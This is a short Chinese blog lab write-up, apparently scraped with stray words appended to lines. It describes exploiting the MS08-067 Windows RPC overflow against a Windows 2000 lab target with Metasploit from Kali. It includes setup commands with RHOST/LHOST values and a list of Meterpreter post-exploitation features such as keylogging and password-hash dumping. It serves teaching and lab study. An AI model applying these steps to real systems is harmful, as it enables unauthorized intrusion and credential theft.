http://www.cnblogs.com/lidong20179210/p/8909569.htmlhtml
MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。sql
在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。防火牆最佳作法和標準的默認防火牆配置,有助於保護網絡資源免受從企業外部發起的攻擊,默認狀況下能創建空鏈接。
此實驗使用的攻擊機是kali,靶機是Win2kServershell
service postgresql start//啓動數據庫
service metasploit start//啓動metasploit數據庫
set RHOST 192.168.11.40
set LHOST 192.168.11.35windows
附上對meterpreter的介紹:http://www.xuebuyuan.com/1993953.html
meterpretershell做爲滲透模塊有不少有用的功能,好比添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。api
它把截圖放在你kali的root路徑下了
網絡
一樣的還能夠利用命令ps獲取系統當前的進程列表、pwd獲取當前的工做目錄和用戶ID、hashdump獲取目標系統的password hash(密碼哈希)等,在着不在贅述。post